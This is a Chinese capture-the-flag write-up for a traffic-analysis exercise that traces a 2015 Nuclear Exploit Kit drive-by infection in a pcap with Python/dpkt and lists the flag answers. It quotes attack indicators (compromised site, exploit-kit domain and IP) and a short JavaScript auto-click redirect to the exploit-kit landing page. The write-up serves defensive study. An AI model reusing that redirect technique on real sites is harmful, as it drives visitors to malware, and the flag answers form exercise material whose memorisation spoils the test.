当前位置: 首页 > news >正文

玄机靶场-2015-01-09-Traffic analysis exercise WP

玄机靶场-2015-01-09-Traffic analysis exercise WP

这道题是一道纯流量分析题,考的是 Nuclear Exploit Kit 的完整感染链分析。没有靶机环境,直接给了一个 pcap 文件,用 Python/dpkt 重组 TCP 流来回答 8 个问题。整体难度中等,关键在于理解 EK 的攻击流程,以及知道 Wireshark 的 tcp.stream 编号规则。

1. 确认活动时间(UTC)

打开 pcap 后看第一个数据包的时间戳,直接就是答案。用 dpkt 读取:

withopen('traffic.pcap','rb')asf:pcap=dpkt.pcap.Reader(f)forts,bufinpcap:print(datetime.datetime.utcfromtimestamp(ts))break

第一个包时间戳对应 UTC 时间 2015-01-05 16:24:40。注意题目文件名是 2015-01-09,但实际流量日期是 1 月 5 日,别被文件名带偏。

Flag 1:2015-01-05 16:24:40


2. 受害 Windows 主机的 IP 和 MAC 地址

流量里只有一个内网 IP:192.168.204.137,其余都是外网服务器。MAC 地址从以太网帧头提取:

eth=dpkt.ethernet.Ethernet(buf)src_mac=':'.join('%02x'%bforbineth.src)# -> 00:0c:29:9d:b8:6d

00:0c:29开头是 VMware 的 OUI,说明这是一台 VMware 虚拟机,典型的分析环境。

Flag 2:192.168.204.137,00:0c:29:9d:b8:6d


3. 受感染网站的 IP 和域名

整个感染链的入口是受害者通过 Google 搜索结果点进去的一个匈牙利网站。从 tcp.stream 0 的 HTTP 请求可以看到:

GET http://www.opushangszer.hu/ HTTP/1.1 Referer: http://www.google.si/url?url=http://www.opushangszer.hu/...

这个网站的 IP 是94.199.178.119,它的页面里嵌入了恶意 SWF,触发了后续的 EK 感染链。这是典型的 Drive-by Download 场景,合法网站被植入了恶意代码。

Flag 3:94.199.178.119,www.opushangszer.hu


4. 漏洞利用工具包(EK)的 IP 和域名

这套 EK 是 Nuclear Exploit Kit,C2 域名是static.domainvertythephones.com,解析到167.160.46.121。从 tcp.stream 3、4、5 可以看到所有与 EK 的通信都指向这个 IP。

域名用了static.前缀伪装成静态资源服务器,是 EK 的常见混淆手段。

Flag 4:167.160.46.121,static.domainvertythephones.com


5. 受害主机使用的浏览器

从所有 HTTP 请求的 User-Agent 字段可以看到:

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

这是 Internet Explorer 8,运行在 Windows 7(NT 6.1)上。IE 8 是 2015 年初仍然常见的老版本浏览器,对各种 EK 的漏洞利用几乎没有防御能力。

Flag 5:Internet Explorer 8


6. 返回 EK 重定向的 HTTP 请求参数值

感染链的中间跳板是akronkappas.com。受感染网站opushangszer.hu里的恶意 SWF(d6bc1dc7da4ed54a62b93b5d0f1cc40c.swf)在 Flash 执行后,向akronkappas.com发了一个 POST 请求:

POST /d2a42e1f7d9a1021bd7d93af414c95c4.php?q=70a9b40eb73da11445c3a3609c8241d9 HTTP/1.1 Host: akronkappas.com Referer: http://imprintchurch.org/d6bc1dc7da4ed54a62b93b5d0f1cc40c.swf

服务器响应返回了一段 HTML,里面用 JavaScript 自动点击一个链接跳转到 EK:

<aid='myLink'href='http://static.domainvertythephones.com/3h251q2c35'>click</a><script>document.getElementById('myLink').click();</script>

题目问的是 GET 请求里唯一的参数值,即q参数的值。

Flag 6:70a9b40eb73da11445c3a3609c8241d9


7. 包含恶意软件负载的 tcp.stream

整个流量里共有 6 个 TCP 流(tcp.stream 0~5):

tcp.stream连接内容
0→ 94.199.178.119:80受感染网站页面
1→ 75.126.113.164:80恶意 SWF 文件(942 bytes)
2→ 69.65.9.55:80Flash POST 请求 + EK 跳转响应
3→ 167.160.46.121:80EK Landing Page(gzip 压缩 HTML)
4→ 167.160.46.121:80恶意软件负载(242,285 bytes,application/octet-stream)
5→ 167.160.46.121:80EK 后续 HTML 响应

tcp.stream 4 是关键:服务器返回了一个 242,285 bytes 的application/octet-stream文件,这是经过 XOR 加密的 PE 可执行文件(恶意软件负载)。Nuclear EK 惯用 XOR 加密 payload 来绕过 IDS 检测。

在 Wireshark 里用过滤器tcp.stream eq 4可以隔离出这条流。

Flag 7:tcp.stream eq 4


8. Flash 播放器版本

Flash 版本信息隐藏在 HTTP 请求头里。在 tcp.stream 1(请求恶意 SWF)和 tcp.stream 3(访问 EK Landing Page)的请求头中都有:

flash-version: 11,8,800,94

这是 Flash Player 11.8.800.94,是 2013 年的版本,存在多个已知漏洞,正是 Nuclear EK 利用的目标。

Flag 8:11.8.800.94


总结

这道题还原了一条完整的 Nuclear EK 感染链:用户通过 Google 点进被植入恶意代码的匈牙利网站 → 触发恶意 SWF → Flash 向跳板服务器 POST 请求 → 跳板返回 EK 链接 → EK Landing Page 检测环境 → 下载 XOR 加密的恶意软件 payload。整个过程不到 2 分钟,受害者全程无感知。

Flag 汇总:

步骤问题答案
1活动时间(UTC)2015-01-05 16:24:40
2受害主机 IP 和 MAC192.168.204.137,00:0c:29:9d:b8:6d
3受感染网站 IP 和域名94.199.178.119,www.opushangszer.hu
4EK IP 和域名167.160.46.121,static.domainvertythephones.com
5浏览器Internet Explorer 8
6GET 参数值70a9b40eb73da11445c3a3609c8241d9
7恶意软件负载所在流tcp.stream eq 4
8Flash 版本11.8.800.94
http://www.jsqmd.com/news/683420/

相关文章:

  • Vue3企业级后台管理系统终极指南:ant-design-vue3-admin快速上手
  • Phi-3.5-Mini-Instruct适配远程办公:离线可用的高性能个人AI助理方案
  • 从Kubernetes到Docker:看云原生技术如何成功‘跨越鸿沟’(给技术布道者的实战指南)
  • AI创业坟场:2026死亡名单——从软件测试视角的深度剖析与警示
  • 基于非线性磁链观测器的永磁同步电机转子位置估计策略的Sci一区顶刊复现及Simulink仿真
  • 无人驾驶车辆MPC模型预测+轨迹跟踪(双移线)Carsim与Matlab联合仿真、附参考资料
  • 深度掌握Navicat使用代码片段模板技巧_高级开发者实战
  • 抖音内容批量下载解决方案:从单视频到用户主页的全链路自动化工具
  • 如何高效进行堆叠分类器的超参数调优:解决 GridSearchCV 卡顿问题
  • 3步实现Windows任务栏透明化:TranslucentTB完整使用指南
  • 从DeepSeek-R1的“偏科”说起:为什么纯强化学习搞定了数学编程,却搞不定写作和工具调用?
  • Docker镜像配置不是写完就跑!20年老炮儿告诉你:没做这7步验证的镜像,禁止上生产
  • AI产品经理:不只是懂算法,更需AI思维:AI大模型产品经理从零基础到进阶
  • Node-RED OPC UA实战:从数据采集到系统集成的全链路设计
  • 如何高效实现OFD转PDF?开源工具Ofd2Pdf完整解决方案
  • 光子极限学习机:光计算与AI融合的前沿技术
  • 别再乱配防火墙了!Docker容器网络隔离的正确姿势:iptables DOCKER-USER链保姆级教程
  • 仅限三级医院DevOps团队内部流通:Docker医疗调试禁忌清单(含17个导致HIPAA审计失败的配置雷区)
  • 期权PCR指标实战避坑指南:成交量、持仓量、成交额PCR到底该信哪一个?
  • 如何永久保存你的微信记忆?WeChatMsg终极备份与数据分析指南
  • 人活在结构里,而非真理中-从 Agent 工程的演进,谈一个对普通人也极其重要的道理
  • 深入Linux内核:看内核源码如何用CPUID指令初始化CPU信息(以5.13.0为例)
  • 用PyTorch/TensorFlow动手画一画:GAN训练中Loss曲线的‘健康’与‘病态’长啥样?
  • 泳池全生命周期运维的核心:2026年5大品牌设备深度横评与选型决策指南
  • egergergeeertGPU算力优化:RTX 4090 D 24GB降级模式部署避坑指南
  • AutoCAD字体管理革命:FontCenter智能插件彻底解决字体缺失难题
  • 造相-Z-Image应用场景:医疗科普插图/法律文书配图/政务宣传图生成
  • AI技术现状与行业应用实践解析
  • 如何用胡桃工具箱彻底改变你的原神游戏体验:免费开源助手完全指南
  • 如何快速批量下载抖音合集:终极工具使用指南